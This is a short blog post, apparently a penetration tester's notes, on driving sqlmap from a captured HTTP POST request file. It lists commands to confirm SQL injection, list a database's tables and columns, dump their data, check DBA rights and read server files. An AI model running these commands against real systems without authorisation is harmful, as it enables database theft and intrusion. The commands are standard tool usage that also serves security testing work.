Category Archives: Security

Sqlmap – HTTP POST Request File

After some reading of http://carnal0wnage.attackresearch.com/2011/03/sqlmap-with-post-requests.html and thinking about how I normally try to deal with post requests, thought I would jot down a few lines as a reminder.

Using a HTTP Request File. You can capture this of course using a proxy or firefox addon quite easily.

sqlmap.py -r filename.txt –level 1 –risk 1 –dbms mysql -p paramatertotest –proxy http://127.0.0.1:8080

** level and risk can be adjusted if SQLmap doesnt confirm there is an injection, but you believe there is. 5 and 3 are the max respectively.

sqlmap.py -r filename.txt — dbms mysql –proxy http://127.0.0.1:8080 –current-db

**Obtain Database Name

sqlmap.py -r filename.txt — dbms mysql –proxy http://127.0.0.1:8080 -D dbname –tables

**Obtain Table Names

sqlmap.py -r filename.txt — dbms mysql –proxy http://127.0.0.1:8080 -D dbname -T tablename –columns

**Obtain Column Names

sqlmap.py -r filename.txt — dbms mysql –proxy http://127.0.0.1:8080 -D dbname -T tablename -C col1,col2,col3 –dump

**Obtain Data from the columns specified

Might want to specifiy a particular technique:

–technique BEUS

** Subtract letters to remove type from test.

B: Boolean-based blind

E: Error-based

U: Union

S: Stacked queries

T: Time-based blind

Some other interesting details:

sqlmap.py -r filename.txt — dbms mysql –proxy http://127.0.0.1:8080 –current-user

** Current DBMS username

sqlmap.py -r filename.txt — dbms mysql –proxy http://127.0.0.1:8080 –current-is-dba

** Is the user a DBA?

sqlmap.py -r filename.txt — dbms mysql –proxy http://127.0.0.1:8080 –file-read=Path

** Read a file from the path provided.

Full documentation: http://sqlmap.sourceforge.net/doc/README.pdf

Preventing SQL Injection: https://www.owasp.org/index.php/SQL_Injection

 

*Recent edit to update the -r flag. for raw request.